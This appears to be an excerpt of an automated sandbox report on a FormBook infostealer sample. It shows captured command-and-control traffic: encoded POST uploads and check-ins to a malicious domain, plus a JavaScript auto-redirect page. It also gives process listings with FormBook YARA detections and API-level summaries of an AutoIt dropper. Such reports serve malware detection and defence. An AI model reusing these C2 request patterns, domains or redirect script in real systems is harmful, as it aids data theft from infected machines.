Jan 10, 2025 22:50:53.944916964 CET	370	OUT	GET /36be/?knE=vl8DPVdxl&2nI=zT+fCPSXWqCfWPgMnoOydtJKsJuCEtGx9/DVuG0pIlquWt59hgdSk8Rx6eVvndf2YPyLwPhL3z2g/EyQU+U7rC5vzNz0ZFCw8d/R3+K3cKRBUeMTJLe+XGej8HjBlTXN1Q== HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.laohub10.net User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 10, 2025 22:50:54.775644064 CET	533	IN	HTTP/1.1 200 OK Server: Apache Content-Type: text/html; charset=utf-8 Accept-Ranges: bytes Cache-Control: max-age=86400 Age: 1 Connection: Close Content-Length: 358 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 23 22 20 69 64 3d 22 78 22 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 78 2e 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 77 6e 2d 73 7a 2e 74 72 61 66 66 69 63 6d 61 6e 61 67 65 72 2e 6e 65 74 2f 3f 68 68 3d 22 2b 62 74 6f 61 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 29 3b 69 66 28 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 29 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 63 6c 69 63 6b 28 29 3b 7d 65 6c 73 65 7b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 76 65 6e 74 28 22 4d 6f 75 73 65 45 76 65 6e 74 73 22 29 3b 65 2e 69 6e 69 74 45 76 65 6e 74 28 22 63 6c 69 63 6b 22 2c 74 72 75 65 2c 74 72 75 65 29 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 78 22 29 2e 64 69 73 70 61 74 63 68 45 76 65 6e 74 28 65 29 3b 7d 3c 2f 73 [TRUNCATED] Data Ascii: <html><head></head><body><a href="#" id="x"></a><script type="text/javascript">x.href="https://down-sz.trafficmanager.net/?hh="+btoa(window.location.host);if(document.all){document.getElementById("x").click();}else{var e=document.createEvent("MouseEvents");e.initEvent("click",true,true);document.getElementById("x").dispatchEvent(e);}</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	65530	188.114.96.3	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:51:00.185157061 CET	632	OUT	POST /kf1m/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 204 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.zkdamdjj.shop Origin: http://www.zkdamdjj.shop Referer: http://www.zkdamdjj.shop/kf1m/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 4a 31 63 58 48 65 4e 38 6e 34 79 33 37 51 49 45 50 47 61 42 49 46 48 4c 5a 73 31 35 67 62 67 73 4c 34 74 56 47 5a 4d 30 4c 7a 58 31 48 71 66 70 38 6e 31 66 52 64 52 59 42 4f 7a 39 41 33 4e 44 2f 70 5a 32 6b 30 4a 66 49 53 58 66 63 42 49 71 67 34 5a 74 2b 32 6c 4f 6a 54 6c 4a 4a 4c 77 49 4e 38 63 77 31 33 52 75 73 39 36 51 76 70 2f 7a 35 48 67 42 4b 6a 2b 67 63 36 6a 6f 4f 6e 67 4a 79 63 63 66 61 42 75 43 49 34 53 63 57 43 51 30 36 75 53 36 53 43 55 2f 53 61 65 56 50 73 56 67 74 4a 53 38 64 41 37 35 74 70 6f 38 4a 72 4a 54 48 62 46 57 6c 63 38 54 64 67 3d Data Ascii: 2nI=tBXlMSkIxJ8XDJ1cXHeN8n4y37QIEPGaBIFHLZs15gbgsL4tVGZM0LzX1Hqfp8n1fRdRYBOz9A3ND/pZ2k0JfISXfcBIqg4Zt+2lOjTlJJLwIN8cw13Rus96Qvp/z5HgBKj+gc6joOngJyccfaBuCI4ScWCQ06uS6SCU/SaeVPsVgtJS8dA75tpo8JrJTHbFWlc8Tdg=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	65531	188.114.96.3	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:51:02.869610071 CET	652	OUT	POST /kf1m/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 224 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.zkdamdjj.shop Origin: http://www.zkdamdjj.shop Referer: http://www.zkdamdjj.shop/kf1m/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 6f 46 63 4d 6e 69 4e 72 58 34 74 70 72 51 49 4f 76 47 65 42 49 5a 48 4c 59 6f 63 2b 54 2f 67 74 75 63 74 57 45 78 4d 33 4c 7a 58 2b 6e 72 30 30 73 6e 69 66 52 5a 6a 59 44 71 7a 39 45 6e 4e 44 2b 5a 5a 78 58 4d 49 65 59 53 56 58 38 42 4f 6b 41 34 5a 74 2b 32 6c 4f 6a 75 4f 4a 4a 54 77 49 5a 41 63 68 6b 33 57 74 73 39 6c 56 76 70 2f 33 35 48 6b 42 4b 69 72 67 64 57 64 6f 4d 76 67 4a 32 4d 63 65 4f 31 74 52 6f 34 51 44 47 44 62 35 4a 72 34 69 53 6d 58 6a 7a 58 39 52 2f 77 31 68 62 34 34 6d 2f 49 39 36 74 42 44 38 4b 44 2f 57 77 47 74 4d 47 4d 4d 4e 4b 32 35 45 67 34 2b 31 70 71 58 73 39 4e 49 58 45 45 51 75 31 41 6c Data Ascii: 2nI=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T/gtuctWExM3LzX+nr00snifRZjYDqz9EnND+ZZxXMIeYSVX8BOkA4Zt+2lOjuOJJTwIZAchk3Wts9lVvp/35HkBKirgdWdoMvgJ2MceO1tRo4QDGDb5Jr4iSmXjzX9R/w1hb44m/I96tBD8KD/WwGtMGMMNK25Eg4+1pqXs9NIXEEQu1Al

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	65532	188.114.96.3	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:51:05.420269966 CET	1669	OUT	POST /kf1m/ HTTP/1.1 Accept: / Accept-Language: en-US Accept-Encoding: gzip, deflate, br Content-Length: 1240 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: max-age=0 Host: www.zkdamdjj.shop Origin: http://www.zkdamdjj.shop Referer: http://www.zkdamdjj.shop/kf1m/ User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 Data Raw: 32 6e 49 3d 74 42 58 6c 4d 53 6b 49 78 4a 38 58 44 6f 46 63 4d 6e 69 4e 72 58 34 74 70 72 51 49 4f 76 47 65 42 49 5a 48 4c 59 6f 63 2b 54 33 67 74 59 51 74 55 6c 78 4d 32 4c 7a 58 33 48 71 54 30 73 6d 67 66 52 67 71 59 44 57 4a 39 43 37 4e 43 63 52 5a 77 6d 4d 49 55 59 53 56 49 73 42 4c 71 67 35 45 74 2b 6e 73 4f 69 43 4f 4a 4a 54 77 49 66 6b 63 68 31 33 57 72 73 39 36 51 76 70 4a 7a 35 48 41 42 4b 37 63 67 64 6a 6d 30 76 58 67 4b 57 63 63 63 39 64 74 4c 6f 34 57 43 47 43 62 35 4f 6a 6a 69 53 71 74 6a 79 53 53 52 39 67 31 73 65 6c 66 39 64 63 6d 6f 62 74 66 30 4c 48 55 66 51 53 30 47 6b 38 48 48 4b 43 6b 45 55 67 47 35 4b 53 55 6c 74 41 55 49 78 63 45 6e 68 74 76 56 53 4a 77 7a 69 6c 36 53 52 36 46 4a 36 78 31 35 66 50 4b 79 34 46 66 66 63 70 4b 36 68 63 62 31 56 75 6f 7a 46 31 49 4a 31 37 72 77 47 6a 2f 4a 2b 32 44 39 39 59 6d 4b 70 32 42 77 64 62 4b 34 47 38 63 47 55 4d 4e 57 46 6a 4a 7a 6f 61 4c 56 50 58 45 4b 6a 2b 53 79 54 56 41 75 59 70 49 79 44 69 71 53 68 30 62 35 47 6c 70 42 37 56 41 68 44 [TRUNCATED] Data Ascii: 2nI=tBXlMSkIxJ8XDoFcMniNrX4tprQIOvGeBIZHLYoc+T3gtYQtUlxM2LzX3HqT0smgfRgqYDWJ9C7NCcRZwmMIUYSVIsBLqg5Et+nsOiCOJJTwIfkch13Wrs96QvpJz5HABK7cgdjm0vXgKWccc9dtLo4WCGCb5OjjiSqtjySSR9g1self9dcmobtf0LHUfQS0Gk8HHKCkEUgG5KSUltAUIxcEnhtvVSJwzil6SR6FJ6x15fPKy4FffcpK6hcb1VuozF1IJ17rwGj/J+2D99YmKp2BwdbK4G8cGUMNWFjJzoaLVPXEKj+SyTVAuYpIyDiqSh0b5GlpB7VAhDsHO07fivWF0h7d3lPjJst98+w9h/BAcpUEXB18/+05nZaoR1Fy9E1VURXpMw5hkC1AJnuo7nP/0QkcbZFGfH8sKZd+0T48KZFkL81XPE3f63UV3T+SvZJWI/IqM39R++SfHxQLRpS30tW74SkLfXGYLoHvazjRIL14GgSlTuAk4CkDX+z6opO5sjZ0hppXJFqYTDR0KR6m0naYlaRwKawsjtNVg8tjLWHinw1CeWU6rv9aS8OtpAd9HEqn8hrTdElo4NaU45JRSoru3su0TIU92ZsZK5ECRDozWaDnSyYBTD81vaxGqkF+TM6I5Umpoqu56zEXPcKpNbZgIUgbG1P9f7iXWEWIysxSuYzLDqIG3/iDTBsNJbp8kUlHsWeoQ1/zrlrLqjZczPdL8W3hyp9K22oUS5x3j8LlFqso9HRUI0fXmoCrt4AJRmVYXrzaG5+YqcwywG/iwGO+RnaXPXROb33NPUxkWoMLG6iO9XN03k7v1KyJfJhVGQBmMRTQpdHr2Hw+P61TsuC1Gf1b2IM1MmD9zmoHg+NGmIjm+0C+3qf/1Zf9KmG93JcUkVa4jefDIDCbfkQx+aTVW4hfwa8LP5lU3XXlid/DElUYkAH0EJ+z68vTY5EfpkaRbApve2iTPboE9n0CfuYCNHRA6WyLTtj6ajncVf8C [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	65533	188.114.96.3	80	3036	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 22:51:07.961061001 CET	371	OUT	GET /kf1m/?2nI=gD/FPiA75bYZCbZDbB+WsVUzjKMJP+r4HqBHW8I3+Q/3qqcwdH4XqO3fnm/yt4rkfBlpHF229jnZH/lk0nBoXOKBKPZyn2cike7Ub3qNJZbDUNl9s1XUkaYGScVYwZ61FA==&knE=vl8DPVdxl HTTP/1.1 Accept: / Accept-Language: en-US Connection: close Host: www.zkdamdjj.shop User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Jan 10, 2025 22:51:47.189107895 CET	964	IN	HTTP/1.1 522 Date: Fri, 10 Jan 2025 21:51:47 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 15 Connection: close Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6OMe6ai1azlXYCabdVEl3JaxMazfBpSXwtK5zXT5V6zu3%2BdyZi%2BF67LZXB9Wj3yZBHDSSD51BcsI0B1iE98CWXc%2FTVG%2F%2BRfX0pbwsq3FdiDO9SP5mrEDorw1SQ85w1LWkzWZzg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Frame-Options: SAMEORIGIN Referrer-Policy: same-origin Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 01 Jan 1970 00:00:01 GMT Server: cloudflare CF-RAY: 8fffe2fd3fb1c475-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1871&min_rtt=1871&rtt_var=935&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=371&delivery_rate=0&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 35 32 32 Data Ascii: error code: 522

Target ID:	0
Start time:	16:48:40
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\M7XS5C07kV.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\M7XS5C07kV.exe"
Imagebase:	0x5d0000
File size:	1'195'008 bytes
MD5 hash:	82FC7A942B147E01BF1E044B839A6A0B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	16:48:41
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\M7XS5C07kV.exe"
Imagebase:	0xba0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1689038879.0000000005A50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1687870269.0000000003590000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1685947198.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	16:48:58
Start date:	10/01/2025
Path:	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe"
Imagebase:	0x220000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3298177839.0000000004F00000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	16:48:59
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\mobsync.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\mobsync.exe"
Imagebase:	0xdc0000
File size:	93'696 bytes
MD5 hash:	F7114D05B442F103BD2D3E20E78A7AA5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3296540364.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3295915751.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.3296328965.0000000000690000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	16:49:13
Start date:	10/01/2025
Path:	C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\xaLonAhdUVQoYXChAoBRnArmuojpvUDkIrRsNEujiuZIiAqJBUezJOmXuMmhZaKgfulKXtmkMlcvasJe\JqFbrQRYIbA.exe"
Imagebase:	0x220000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3300816355.00000000049C0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	16:49:25
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff6d20e0000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.1%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	8.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	49

Executed Functions

Function 005D3B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 005D3B68
IsDebuggerPresent.KERNEL32 ref: 005D3B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,006952F8,006952E0,?,?), ref: 005D3BEB

Part of subcall function 005D7BCC: _memmove.LIBCMT ref: 005D7C06

Part of subcall function 005E092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,005D3C14,006952F8,?,?,?), ref: 005E096E

SetCurrentDirectoryW.KERNEL32(?), ref: 005D3C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,00687770,00000010), ref: 0060D281
SetCurrentDirectoryW.KERNEL32(?,006952F8,?,?,?), ref: 0060D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00684260,006952F8,?,?,?), ref: 0060D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 0060D346

Part of subcall function 005D3A46: GetSysColorBrush.USER32(0000000F), ref: 005D3A50
Part of subcall function 005D3A46: LoadCursorW.USER32(00000000,00007F00), ref: 005D3A5F
Part of subcall function 005D3A46: LoadIconW.USER32(00000063), ref: 005D3A76
Part of subcall function 005D3A46: LoadIconW.USER32(000000A4), ref: 005D3A88
Part of subcall function 005D3A46: LoadIconW.USER32(000000A2), ref: 005D3A9A
Part of subcall function 005D3A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 005D3AC0
Part of subcall function 005D3A46: RegisterClassExW.USER32(?), ref: 005D3B16

Part of subcall function 005D39D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 005D3A03
Part of subcall function 005D39D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 005D3A24
Part of subcall function 005D39D5: ShowWindow.USER32(00000000,?,?), ref: 005D3A38
Part of subcall function 005D39D5: ShowWindow.USER32(00000000,?,?), ref: 005D3A41

Part of subcall function 005D434A: _memset.LIBCMT ref: 005D4370
Part of subcall function 005D434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 005D4415

Strings

%f, xrefs: 005D3C44
runas, xrefs: 0060D33A
This is a third-party compiled AutoIt script., xrefs: 0060D279

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%f
API String ID: 529118366-210764952
Opcode ID: 9f33512510a8b9139c6cfe3f83c325a1a795ae145cfa6e1d604f269a9bed68ea
Instruction ID: 34b5afa1e2a58561f568541ca40c264f243770a7e6d8c3877f5b4f1781c75d3c
Opcode Fuzzy Hash: 9f33512510a8b9139c6cfe3f83c325a1a795ae145cfa6e1d604f269a9bed68ea
Instruction Fuzzy Hash: 4451D570908649AADF22EFB8DC199FD7F7ABF89700F004167F452A23A1DA705B45CB21

Function 005D49A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 005D49CD

Part of subcall function 005D7BCC: _memmove.LIBCMT ref: 005D7C06

GetCurrentProcess.KERNEL32(?,0065FAEC,00000000,00000000,?), ref: 005D4A9A
IsWow64Process.KERNEL32(00000000), ref: 005D4AA1
GetNativeSystemInfo.KERNELBASE(00000000), ref: 005D4AE7
FreeLibrary.KERNEL32(00000000), ref: 005D4AF2
GetSystemInfo.KERNEL32(00000000), ref: 005D4B23
GetSystemInfo.KERNEL32(00000000), ref: 005D4B2F

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 9ba4cb2a3633a9455e8b70ba15f689195e85adc50e0d82a1bde5f6b77c3e4ba8
Instruction ID: ca1bc14205ceab00dfb73a7343c4a3740f80325ec04560631acb2c5a924545bd
Opcode Fuzzy Hash: 9ba4cb2a3633a9455e8b70ba15f689195e85adc50e0d82a1bde5f6b77c3e4ba8
Instruction Fuzzy Hash: 0591A3319897C1DAC735DB6885501AFBFF6BF29300B444EAFD0C693B41D630A548CB59

Function 005D4E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,005D4D8E,?,?,00000000,00000000), ref: 005D4E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005D4D8E,?,?,00000000,00000000), ref: 005D4EB0
LoadResource.KERNEL32(?,00000000,?,?,005D4D8E,?,?,00000000,00000000,?,?,?,?,?,?,005D4E2F), ref: 0060D937
SizeofResource.KERNEL32(?,00000000,?,?,005D4D8E,?,?,00000000,00000000,?,?,?,?,?,?,005D4E2F), ref: 0060D94C
LockResource.KERNEL32(005D4D8E,?,?,005D4D8E,?,?,00000000,00000000,?,?,?,?,?,?,005D4E2F,00000000), ref: 0060D95F

Strings

SCRIPT, xrefs: 005D4EA6

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 8bfa9668ad8b3fae10e4c28241bdfaf10c30db0b31c7b9916cf089ddd437163c
Instruction ID: 9ce16855aa7012b3d66b4cc063b2476fde2abb3ac52d22e47c46c4ca78b59908
Opcode Fuzzy Hash: 8bfa9668ad8b3fae10e4c28241bdfaf10c30db0b31c7b9916cf089ddd437163c
Instruction Fuzzy Hash: 88112175240701BFD7218BA5EC48F677BBEFBC5751F104669F405D6250DB71D9008A61

Function 005DFCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

%f, xrefs: 005DFCF3
pbi, xrefs: 006149B9

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID: BuffCharUpper
String ID: pbi$%f
API String ID: 3964851224-1749436832
Opcode ID: 660809b296260c4e8cb04109b048483c2dbfb6b81b04a05374c74867cac90f8f
Instruction ID: 23611fddec569dbff5313cf882cf51e4b820fb15061125dc0af0cb026a2b4c13
Opcode Fuzzy Hash: 660809b296260c4e8cb04109b048483c2dbfb6b81b04a05374c74867cac90f8f
Instruction Fuzzy Hash: E4928E70508381CFD724DF19C484B6ABBE5BF85304F18992EE58A8B392D775EC85CB92

Function 005DE6A0 Relevance: 7.4, Strings: 5, Instructions: 1102COMMON

Download Yara Rule

Strings

Ddi, xrefs: 005DEABA
Variable must be of type 'Object'., xrefs: 00613E62
Ddi, xrefs: 00613B2E
Ddi, xrefs: 005DEAC1
Ddi, xrefs: 00613AF5

Memory Dump Source

Source File: 00000000.00000002.1446202466.00000000005D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005D0000, based on PE: true

Associated: 00000000.00000002.1446142615.00000000005D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.000000000065F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446347494.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1446483787.000000000068E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1447339878.0000000000697000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5d0000_M7XS5C07kV.jbxd

Similarity

API ID:
String ID: Ddi$Ddi$Ddi$Ddi$Variable must be of type 'Object'.
API String ID: 0-2278049409
Opcode ID: cfe72f9a186ff9d1c7df8e7fc89bc66494b234bcfc2132d80178ca36439ee653
Instruction ID: 7bc41b9d638de9314dad2a29b7fc2c49a5a5ed2a3f52a68d0ceedf3373924a4c
